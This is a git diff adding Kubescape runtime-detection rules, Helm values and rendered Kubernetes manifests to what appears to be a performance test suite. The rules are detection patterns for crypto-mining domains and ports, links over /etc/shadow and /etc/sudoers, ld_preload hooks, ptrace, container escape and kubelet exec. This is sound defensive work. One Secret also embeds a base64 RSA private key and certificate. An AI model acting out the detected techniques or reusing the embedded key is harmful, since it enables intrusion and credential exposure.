isTriggerAlert: true + mitreTactic: TA0004 + mitreTechnique: T1611 + name: Process tries to escape container + profileDependency: 2 + severity: 5 + supportPolicy: false + tags: + - unshare + - escape + - unshare + - anomaly + - applicationprofile + - description: Detecting XMR Crypto Miners by randomx algorithm usage. 
+ enabled: true + expressions: + message: '''XMR Crypto Miner process: ('' + event.exepath + '') executed''' + ruleExpression: + - eventType: randomx + expression: 'true' + uniqueId: event.exepath + '_' + event.comm + id: R1007 + isTriggerAlert: true + mitreTactic: TA0040 + mitreTechnique: T1496 + name: Crypto miner launched + profileDependency: 2 + severity: 10 + supportPolicy: false + tags: + - crypto + - miners + - malicious + - description: Detecting Crypto miners communication by domain + enabled: true + expressions: + message: '''Communication with a known crypto mining domain: '' + event.name' + ruleExpression: + - eventType: dns + expression: >- + event.name in ['2cryptocalc.com.', '2miners.com.', 'antpool.com.', + 'asia1.ethpool.org.', 'bohemianpool.com.', 'botbox.dev.', + 'btm.antpool.com.', 'c3pool.com.', 'c4pool.org.', + 'ca.minexmr.com.', 'cn.stratum.slushpool.com.', + 'dash.antpool.com.', 'data.miningpoolstats.stream.', + 'de.minexmr.com.', 'eth-ar.dwarfpool.com.', + 'eth-asia.dwarfpool.com.', 'eth-asia1.nanopool.org.', + 'eth-au.dwarfpool.com.', 'eth-au1.nanopool.org.', + 'eth-br.dwarfpool.com.', 'eth-cn.dwarfpool.com.', + 'eth-cn2.dwarfpool.com.', 'eth-eu.dwarfpool.com.', + 'eth-eu1.nanopool.org.', 'eth-eu2.nanopool.org.', + 'eth-hk.dwarfpool.com.', 'eth-jp1.nanopool.org.', + 'eth-ru.dwarfpool.com.', 'eth-ru2.dwarfpool.com.', + 'eth-sg.dwarfpool.com.', 'eth-us-east1.nanopool.org.', + 'eth-us-west1.nanopool.org.', 'eth-us.dwarfpool.com.', + 'eth-us2.dwarfpool.com.', 'eth.antpool.com.', + 'eu.stratum.slushpool.com.', 'eu1.ethermine.org.', + 'eu1.ethpool.org.', 'fastpool.xyz.', 'fr.minexmr.com.', + 'kriptokyng.com.', 'mine.moneropool.com.', 'mine.xmrpool.net.', + 'miningmadness.com.', 'monero.cedric-crispin.com.', + 'monero.crypto-pool.fr.', 'monero.fairhash.org.', + 'monero.hashvault.pro.', 'monero.herominers.com.', 'monerod.org.', + 'monerohash.com.', 'moneroocean.stream.', 'monerop.com.', + 'multi-pools.com.', 'p2pool.io.', 'pool.kryptex.com.', + 'pool.minexmr.com.', 'pool.monero.hashvault.pro.', + 'pool.rplant.xyz.', 'pool.supportxmr.com.', 'pool.xmr.pt.', + 'prohashing.com.', 'rx.unmineable.com.', 'sg.minexmr.com.', + 'sg.stratum.slushpool.com.', 'skypool.org.', + 'solo-xmr.2miners.com.', 'ss.antpool.com.', + 'stratum-btm.antpool.com.', 'stratum-dash.antpool.com.', + 'stratum-eth.antpool.com.', 'stratum-ltc.antpool.com.', + 'stratum-xmc.antpool.com.', 'stratum-zec.antpool.com.', + 'stratum.antpool.com.', 'supportxmr.com.', 'trustpool.cc.', + 'us-east.stratum.slushpool.com.', 'us1.ethermine.org.', + 'us1.ethpool.org.', 'us2.ethermine.org.', 'us2.ethpool.org.', + 'web.xmrpool.eu.', 'www.domajorpool.com.', 'www.dxpool.com.', + 'www.mining-dutch.nl.', 'xmc.antpool.com.', + 'xmr-asia1.nanopool.org.', 'xmr-au1.nanopool.org.', + 'xmr-eu1.nanopool.org.', 'xmr-eu2.nanopool.org.', + 'xmr-jp1.nanopool.org.', 'xmr-us-east1.nanopool.org.', + 'xmr-us-west1.nanopool.org.', 'xmr.2miners.com.', + 'xmr.crypto-pool.fr.', 'xmr.gntl.uk.', 'xmr.nanopool.org.', + 'xmr.pool-pay.com.', 'xmr.pool.minergate.com.', + 'xmr.solopool.org.', 'xmr.volt-mine.com.', 'xmr.zeropool.io.', + 'zec.antpool.com.', 'zergpool.com.', 'auto.c3pool.org.', + 'us.monero.herominers.com.', 'xmr.kryptex.network.'] + uniqueId: event.name + '_' + event.comm + id: R1008 + isTriggerAlert: true + mitreTactic: TA0011 + mitreTechnique: T1071.004 + name: Crypto Mining Domain Communication + profileDependency: 2 + severity: 10 + supportPolicy: false + tags: + - network + - crypto + - miners + - malicious + - dns + - description: 
Detecting Crypto Miners by suspicious port usage. + enabled: true + expressions: + message: >- + 'Detected crypto mining related port communication on port ' + + string(event.dstPort) + ' to ' + event.dstAddr + ' with protocol ' + + event.proto + ruleExpression: + - eventType: network + expression: >- + event.proto == 'TCP' && event.pktType == 'OUTGOING' && + event.dstPort in [3333, 45700] && + !nn.was_address_in_egress(event.containerId, event.dstAddr) + uniqueId: event.comm + '_' + string(event.dstPort) + id: R1009 + isTriggerAlert: false + mitreTactic: TA0011 + mitreTechnique: T1071 + name: Crypto Mining Related Port Communication + profileDependency: 1 + severity: 3 + supportPolicy: false + tags: + - network + - crypto + - miners + - malicious + - networkprofile + - description: Detects symlink creation over sensitive files + enabled: true + expressions: + message: >- + 'Symlink created over sensitive file: ' + event.oldPath + ' -> ' + + event.newPath + ruleExpression: + - eventType: symlink + expression: >- + (event.oldPath.startsWith('/etc/shadow') || + event.oldPath.startsWith('/etc/sudoers')) && + !ap.was_path_opened(event.containerId, event.oldPath) + uniqueId: event.comm + '_' + event.oldPath + id: R1010 + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1005 + name: Soft link created over sensitive file + profileDependency: 1 + severity: 5 + supportPolicy: true + tags: + - anomaly + - symlink + - applicationprofile + - description: Detecting ld_preload hook techniques. + enabled: false + expressions: + message: >- + eventType == 'exec' ? 'Process (' + event.comm + ') is using a dynamic + linker hook: ' + process.get_ld_hook_var(event.pid) : 'The dynamic + linker configuration file (' + event.path + ') was modified by process + (' + event.comm + ')' + ruleExpression: + - eventType: exec + expression: >- + event.comm != 'java' && event.containerName != 'matlab' && + process.get_ld_hook_var(event.pid) != '' + - eventType: open + expression: >- + event.path == '/etc/ld.so.preload' && has(event.flagsRaw) && + event.flagsRaw != 0 + uniqueId: 'eventType == ''exec'' ? ''exec_'' + event.comm : ''open_'' + event.path' + id: R1011 + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1574.006 + name: ld_preload hooks technique detected + profileDependency: 1 + severity: 5 + supportPolicy: true + tags: + - exec + - malicious + - applicationprofile + - description: Detecting hardlink creation over sensitive files. + enabled: true + expressions: + message: >- + 'Hardlink created over sensitive file: ' + event.oldPath + ' - ' + + event.newPath + ruleExpression: + - eventType: hardlink + expression: >- + (event.oldPath.startsWith('/etc/shadow') || + event.oldPath.startsWith('/etc/sudoers')) && + !ap.was_path_opened(event.containerId, event.oldPath) + uniqueId: event.comm + '_' + event.oldPath + id: R1012 + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1005 + name: Hard link created over sensitive file + profileDependency: 1 + severity: 5 + supportPolicy: true + tags: + - files + - malicious + - applicationprofile + - description: Detecting potentially malicious ptrace usage. 
+ enabled: true + expressions: + message: '''Malicious ptrace usage detected from: '' + event.comm' + ruleExpression: + - eventType: ptrace + expression: 'true' + uniqueId: event.exepath + '_' + event.comm + id: R1015 + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1622 + name: Malicious Ptrace Usage + profileDependency: 2 + severity: 5 + supportPolicy: false + tags: + - process + - malicious + - description: >- + Detects io_uring operations that were not recorded during the initial + observation period, indicating potential unauthorized activity. + enabled: true + expressions: + message: >- + 'Unexpected io_uring operation detected: (opcode=' + + string(event.opcode) + ') flags=0x' + (has(event.flagsRaw) ? + string(event.flagsRaw) : '0') + ' in ' + event.comm + '.' + ruleExpression: + - eventType: iouring + expression: 'true' + uniqueId: string(event.opcode) + '_' + event.comm + id: R1030 + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1218 + name: Unexpected io_uring Operation Detected + profileDependency: 0 + severity: 5 + supportPolicy: true + tags: + - syscalls + - io_uring + - applicationprofile + - description: >- + Detects plaintext exec API calls intercepted from kubelet TLS + connections, indicating potential unauthorized command execution via the + kubelet API. + enabled: true + expressions: + message: >- + 'Kubelet TLS exec request intercepted: ' + event.tlsData + ' (len=' + + string(event.tlsDataLen) + ', type=' + string(event.tlsEventType) + + ') in ' + event.comm + '.' + ruleExpression: + - eventType: kubelet_tls + expression: 'true' + uniqueId: event.comm + '_' + string(event.tlsEventType) + id: R1031 + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1609 + name: Kubelet TLS Exec Request Detected + profileDependency: 0 + severity: 8 + supportPolicy: false + tags: + - kubelet + - tls + - exec + - container_administration_command diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape-values.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape-values.yaml new file mode 100644 index 00000000000..cb9e252b95e --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape-values.yaml @@ -0,0 +1,38 @@ +storage: + image: + repository: ghcr.io/k8sstormcenter/storage + tag: "dev-e64d59a" + +nodeAgent: + image: + repository: ghcr.io/k8sstormcenter/node-agent + tag: "dev-e64d59a" + config: + maxLearningPeriod: 2m + learningPeriod: 2m + updatePeriod: 10000m + # The Service declares a "prometheus" port (8080) but node-agent's stock + # config disables the exporter. Enable it so the perf_tool's + # KubescapeNodeAgentMetrics recorder can scrape per-node alert/event + # counters. Note: the chart key is the string "enable"/"disable", which + # the chart converts to the JSON `prometheusExporterEnabled` boolean + # in the node-agent ConfigMap. + prometheusExporter: enable + ruleCooldown: + ruleCooldownDuration: 0h + ruleCooldownAfterCount: 1000000000 + ruleCooldownOnProfileFailure: false + ruleCooldownMaxSize: 20000 +capabilities: + runtimeDetection: enable + networkEventsStreaming: disable + # Top-level prometheusExporter capability gate. Both this and + # nodeAgent.config.prometheusExporter must be `enable` for the node-agent + # to bind on port 8080. 
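+  # (A hedged post-deploy check that both gates took effect -- assumes the
+  #  chart's default node-agent DaemonSet name and the conventional /metrics
+  #  path, neither confirmed here:
+  #    kubectl -n honey port-forward ds/node-agent 8080:8080
+  #    curl -s localhost:8080/metrics | head
+  #  )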
+ prometheusExporter: enable +alertCRD: + installDefault: true + scopeClustered: true +clusterName: bobexample +ksNamespace: honey +excludeNamespaces: "kubescape,kube-system,kube-public,kube-node-lease,local-path-storage,gmp-system,gmp-public,storm,lightening,cert-manager,kube-flannel,ingress-nginx,olm,px-operator,honey,pl,clickhouse" diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape.rendered.kube-system.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape.rendered.kube-system.yaml new file mode 100644 index 00000000000..392f98dd58f --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape.rendered.kube-system.yaml @@ -0,0 +1,25 @@ +apiVersion: rbac.authorization.k8s.io/v1 +kind: RoleBinding +metadata: + name: storage-auth-reader + namespace: kube-system + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: Role + name: extension-apiserver-authentication-reader +subjects: +- kind: ServiceAccount + name: storage + namespace: honey diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape.rendered.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape.rendered.yaml new file mode 100644 index 00000000000..1784290193f --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape.rendered.yaml @@ -0,0 +1,4433 @@ +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: operatorcommands.kubescape.io +spec: + group: kubescape.io + names: + plural: operatorcommands + singular: operatorcommand + kind: OperatorCommand + shortNames: + - opcmd + scope: Namespaced + versions: + - name: v1alpha1 + served: true + storage: true + schema: + openAPIV3Schema: + type: object + properties: + spec: + type: object + properties: + guid: + type: string + commandType: + type: string + commandVersion: + type: string + nullable: true + designators: + type: array + items: + type: object + additionalProperties: true + body: + type: string + format: byte + nullable: true + ttl: + type: string + format: duration + nullable: true + args: + type: object + additionalProperties: true + nullable: true + commandIndex: + type: integer + nullable: true + commandCount: + type: integer + nullable: true + status: + type: object + properties: + started: + type: boolean + startedAt: + type: string + format: date-time + nullable: true + completed: + type: boolean + completedAt: + type: string + format: date-time + nullable: true + executer: + type: string + nullable: true + error: + type: object + nullable: true + properties: + reason: + type: string + nullable: true + message: + type: string + nullable: true + errorCode: + type: integer + nullable: true + payload: + type: string + format: byte + nullable: true + subresources: + status: {} +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: rules.kubescape.io +spec: + group: kubescape.io + names: + kind: Rules + listKind: RulesList + plural: rules + singular: rule + scope: Namespaced + versions: + - name: v1 + served: true + storage: true + 
schema: + openAPIV3Schema: + type: object + properties: + apiVersion: + type: string + kind: + type: string + metadata: + type: object + spec: + type: object + properties: + rules: + type: array + items: + type: object + properties: + enabled: + type: boolean + description: Whether the rule is enabled + id: + type: string + description: Unique identifier for the rule + name: + type: string + description: Name of the rule + description: + type: string + description: Description of the rule + expressions: + type: object + properties: + message: + type: string + description: Message expression + uniqueId: + type: string + description: Unique identifier expression + ruleExpression: + type: array + items: + type: object + properties: + eventType: + type: string + description: Type of event this expression handles + expression: + type: string + description: The rule expression string + required: + - eventType + - expression + required: + - message + - uniqueId + - ruleExpression + profileDependency: + type: integer + enum: + - 0 + - 1 + - 2 + description: Profile dependency level (0=Required, 1=Optional, + 2=NotRequired) + severity: + type: integer + description: Severity level of the rule + supportPolicy: + type: boolean + description: Whether the rule supports rule policy enforcement + default: false + tags: + type: array + items: + type: string + description: Tags associated with the rule + state: + type: object + additionalProperties: true + description: State information for the rule + agentVersionRequirement: + type: string + description: Agent version requirement to evaluate this rule + (supports semver ranges like ~1.0, >=1.2.0, etc.) + isTriggerAlert: + type: boolean + description: Whether the rule is a trigger alert + default: true + mitreTechnique: + type: string + description: MITRE technique associated with the rule + mitreTactic: + type: string + description: MITRE tactic associated with the rule + required: + - enabled + - id + - name + - description + - expressions + - profileDependency + - severity + - supportPolicy + - isTriggerAlert + - mitreTechnique + - mitreTactic + required: + - rules + subresources: + status: {} +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: servicesscanresults.kubescape.io +spec: + group: kubescape.io + names: + kind: ServiceScanResult + plural: servicesscanresults + shortNames: + - kssa + singular: servicescanresult + scope: Namespaced + versions: + - name: v1 + served: true + storage: true + schema: + openAPIV3Schema: + type: object + properties: + spec: + type: object + properties: + clusterIP: + type: string + ports: + type: array + items: + type: object + properties: + port: + type: integer + protocol: + type: string + sessionLayer: + type: string + presentationLayer: + type: string + applicationLayer: + type: string + authenticated: + type: boolean + nullable: true +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: runtimerulealertbindings.kubescape.io +spec: + group: kubescape.io + names: + kind: RuntimeRuleAlertBinding + plural: runtimerulealertbindings + shortNames: + - rab + singular: runtimerulealertbinding + scope: Cluster + versions: + - name: v1 + served: true + storage: true + schema: + openAPIV3Schema: + type: object + properties: + spec: + type: object + properties: + namespaceSelector: + type: object + properties: + matchExpressions: + type: array + items: + type: object + properties: + key: + type: string + operator: + type: string + values: + type: 
array + items: + type: string + matchLabels: + type: object + additionalProperties: + type: string + podSelector: + type: object + properties: + matchExpressions: + type: array + items: + type: object + properties: + key: + type: string + operator: + type: string + values: + type: array + items: + type: string + matchLabels: + type: object + additionalProperties: + type: string + rules: + type: array + items: + type: object + oneOf: + - not: + anyOf: + - required: + - ruleID + - required: + - ruleName + required: + - ruleTags + - not: + anyOf: + - required: + - ruleTags + - required: + - ruleName + required: + - ruleID + - not: + anyOf: + - required: + - ruleTags + - required: + - ruleID + required: + - ruleName + properties: + parameters: + type: object + additionalProperties: true + ruleID: + type: string + ruleName: + type: string + ruleTags: + type: array + items: + type: string + severity: + type: string +--- +kind: ServiceAccount +apiVersion: v1 +metadata: + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' + name: kubescape + namespace: honey +automountServiceAccountToken: false +--- +kind: ServiceAccount +apiVersion: v1 +metadata: + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln + tier: ks-control-plane + kubescape.io/ignore: 'true' + name: kubevuln + namespace: honey +automountServiceAccountToken: false +--- +apiVersion: v1 +kind: ServiceAccount +metadata: + name: node-agent + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' +--- +kind: ServiceAccount +apiVersion: v1 +metadata: + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' + name: operator + namespace: honey +automountServiceAccountToken: false +--- +kind: ServiceAccount +apiVersion: v1 +metadata: + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: prometheus-exporter + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: prometheus-exporter + tier: ks-control-plane + kubescape.io/ignore: 'true' + name: prometheus-exporter + namespace: honey +automountServiceAccountToken: false +--- +kind: ServiceAccount +apiVersion: v1 +metadata: + name: storage + namespace: honey + annotations: 
null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +--- +kind: Secret +apiVersion: v1 +metadata: + name: cloud-secret + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: cloud-secret + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: cloud-secret + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/infra: credentials +type: Opaque +data: + account: '' + accessKey: '' +--- +apiVersion: v1 +kind: Secret +metadata: + name: kubescape-admission-webhook.honey.svc-kubescape-tls-pair + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' +type: kubernetes.io/tls +data: + tls.key: LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFcEFJQkFBS0NBUUVBMzFENjV6WGVoZzBKd0ZIS1pBYXBuNUhtYUwycVdyaE9tVllNTUJPVlVyU2VIdGgwCjZVUHRNbUVXZFhrM2ZCUURUbEtZTWJBVERPMm4vVmdZMnRjRFlhM0ZRUFVNdmlRWHVRN21Ud29kVnJ1YkpKUVkKeldBeWR2aUVRdDk4dlVLeFQ1L2NGT1pyRUs1UGVSeXJjUzNJWHZnQWpMR3J6UlI3RG5kcmtuV0JhTHNVcXp0Ngp6b3E3bjVLSXlndm5yU3YrTCtOejkrb3FRKzB3UWFnTVpoL3FqRDBoR21xS0N2VkhtWUJsRUIvMlgrSGV4UTJXClV5SkV1Tis2L0xWYkpKaktueFZkQlMra0JFL0pXSUFad2xDbDI4Z3FRN1AweDVoK3JldHpqZ2VVemJFUGNORFkKYmhSdUYxOVNzSGM1MlRib2EwWk9jUE1ic3NrbC9kRDdRUkYwQ1FJREFRQUJBb0lCQUNaSWVLcllaa3h1d2NReApnVlBDZktPNVhGbUtZa0RwSmJoTnN3c3U0RU5zYVVyNmFwaHVwNlFpVnJwT3pIODk0dzh6UTVvSkNFc0lGdXRzCmhkNUdTL01iMmh2M3BuYVdNMmJyTWZwTXpwakcwcUxqckpqUXEvWVBSb1U4VU9NVkl0WjJua0VLKzBIQjBDZ0EKRFRmNjFFWExtRFNHWk9Ca2FYQWljdE9KeDJTUGs4RTJxaUJHVEEvSmorNmdOWHJod2V0SndvbW9jRzhsSG1tdQpzYzhnZlJrcnJuR2dmZ1dDWDEwM0czcGRqTGwzT0dtQ0xHRWVnV1ZUKzYzUExncFJnT29vbmkxcFBOdVRlbkpRCks2MFozVWJFVWt2VmJtWXBtMWRGR2hQMDBlZ1VWY3NzK242UEEzUlgwdDRocmpQQnYyYjJQOTVwQVVLOHkwN2kKdGY3bkZEMENnWUVBNWNSaDExSXh4anZDemYrZkJ0OUtNb2NmWjY0LytZVGFFTml1dzlMSk5kT3I4M01FM0wvOQpnTGpTbmsvS2p4eVM5OEV5WFZMSFduSm5yYlBxeWdrYmJvT3Zxejd6UjhWbUZHQURnQzlXMzc3SUJJRzByME54CnZKTnNYeFlXS2RKWm8wMzcrMGFvcUU1VmhSQXZqYTJhUm9QSDdmWVRlcFdoQ0JFMnFNQ2NwS2NDZ1lFQStOQU4KL2pLcndVYktiVXFkb3p3TDdtZ2hJZXpFWG80N1daWks1RHIzMGZhTXhFTU1vekxaOC9VbkVxbk1OUXJZamhaMQppQld2ZGthZXJJUm5DcEZmS2NIKzhlcUdPZWxkNmloa09CekxwWVBYdVVzUGp1VnNwMnlKMllyeTV2Q0pFMnMwCmI0VERiZ2RPVU5RYkFTYmxjK0lmeGdXWTR2TEdDNURwYWpzU1I4OENnWUE2M1VNTHZQMFBna1A0THFMNVNiOWkKam9lWE1tY2xiOG5HUXgwVEFpK1dZTEpPM29yQ1cxV0E0dGppd2lKczQ2OHJWZzJuSnd2M3VoT2h4dFJDQ205QwpzdTRRZTBJc2d3QVIvRDhwV2ZkeHZ4alRQcitobnkvR1ZpYVBmY01UMTlZckpsR0dJS1lZNkdpMGZGOFNkd1Z0ClIxbXpOelhxVStjN2Y5MTNBbEdmUlFLQmdRQ083WDFNUzdGTVdxMEg4VGZ5d0JpZWdDU2dSMUZhZTl2dUQ1Ni8KMG52dm1mQ3RBVk11SUpVQlJnK0c4aEZEV3hLaE5KZVpiOU9XWHVUaGQwRjEyYUpQNjRmWFVnQi9IZVo4RDIzYQpxZmYyQVhHWG1GMjhtV0E4SU9aakdDV0dzaUFjRHBaVmhXOTZNaW96MWxRWTZrNGVyb1BRRGdFUVJhT3NtemJxCmRqcC9Fd0tCZ1FDd2xlZWpEbkpWN3lJY0J0MElLWUtEdFVPS0RINm5ZbFltTUxrWkZtazBsSW1HRGw4cElpRXcKVTFrZ0lVcnZ5VHBmb3QzdFk3NXVFTW5KSGYvSkFHW
kFCNnlHa2dVRzZvRmRQN0N5YUJLMjRSYndUTUk3WmpreQpFUXFvSWVwKzdIUWt6dy9QRzB2VmtZTTQ1KzIrc24renZHeXNYdTVOdFltdEp6cjVFQ3ZicFE9PQotLS0tLUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQ== + tls.crt: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURaRENDQWt5Z0F3SUJBZ0lRS0VWZE13bGF5QUU5R2hmeERNRWQzekFOQmdrcWhraUc5dzBCQVFzRkFEQVcKTVJRd0VnWURWUVFEREFzcUxtaHZibVY1TG5OMll6QWVGdzB5TmpBME1qVXdOak0xTVRoYUZ3MHlPVEF5TVRJdwpOak0xTVRoYU1EQXhMakFzQmdOVkJBTVRKV3QxWW1WelkyRndaUzFoWkcxcGMzTnBiMjR0ZDJWaWFHOXZheTVvCmIyNWxlUzV6ZG1Nd2dnRWlNQTBHQ1NxR1NJYjNEUUVCQVFVQUE0SUJEd0F3Z2dFS0FvSUJBUURmVVBybk5kNkcKRFFuQVVjcGtCcW1ma2Vab3ZhcGF1RTZaVmd3d0U1VlN0SjRlMkhUcFErMHlZUloxZVRkOEZBTk9VcGd4c0JNTQo3YWY5V0JqYTF3TmhyY1ZBOVF5K0pCZTVEdVpQQ2gxV3U1c2tsQmpOWURKMitJUkMzM3k5UXJGUG45d1U1bXNRCnJrOTVIS3R4TGNoZStBQ01zYXZORkhzT2QydVNkWUZvdXhTck8zck9pcnVma29qS0MrZXRLLzR2NDNQMzZpcEQKN1RCQnFBeG1IK3FNUFNFYWFvb0s5VWVaZ0dVUUgvWmY0ZDdGRFpaVElrUzQzN3I4dFZza21NcWZGVjBGTDZRRQpUOGxZZ0JuQ1VLWGJ5Q3BEcy9USG1INnQ2M09PQjVUTnNROXcwTmh1Rkc0WFgxS3dkem5aTnVoclJrNXc4eHV5CnlTWDkwUHRCRVhRSkFnTUJBQUdqZ1pNd2daQXdEZ1lEVlIwUEFRSC9CQVFEQWdXZ01CMEdBMVVkSlFRV01CUUcKQ0NzR0FRVUZCd01CQmdnckJnRUZCUWNEQWpBTUJnTlZIUk1CQWY4RUFqQUFNQjhHQTFVZEl3UVlNQmFBRk54aApoU3I0ZmhScnVScFpabnlSWUpRanA1WjhNREFHQTFVZEVRUXBNQ2VDSld0MVltVnpZMkZ3WlMxaFpHMXBjM05wCmIyNHRkMlZpYUc5dmF5NW9iMjVsZVM1emRtTXdEUVlKS29aSWh2Y05BUUVMQlFBRGdnRUJBQmQ3NXhRV2RaeUQKTVF3a09YSkdBZ1h2VTAxUXh2SmhvMTZZMlVlbjk5T2o2SzBRVjNrRkRnUE15MEo0RHdGdkhiNjhLK0s3YnpuWgoxN1RzTlJwbmQxNDR2OElwUW0rL2JHYThmQkJibnJTeTZJWUZzejZrUkFMdERONXJGM0IzT3JsOE9NMFNna3RYCkNrdVc2ZGNOdXBnOTUyTXNVdDJCL2g5Z2lDbXY4N05VRWZXNUZJOGZ1amtTbktxT2lvSXpKek44NURLSENxOEMKOFZhbFJEMXZ4cDdZK3NRT2dqOTJmY1dXQUlYZDRlZnBkS1dNNHJCWGJhSUVKdGNPK3dNV0dvdU5iY2t3bTQxZQphZkR0V3J1eWx5M1RVRDY1NUpQSDVoZFFnNkFNNlRlNzQ2NGtRUElRSmN1R0R4U1dPTjVJaW5ncjlzTlRGUVhzClc5NlRVWjhDSzU0PQotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg== +--- +apiVersion: v1 +kind: Secret +metadata: + name: storage-ca + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +type: kubernetes.io/tls +data: + tls.crt: 
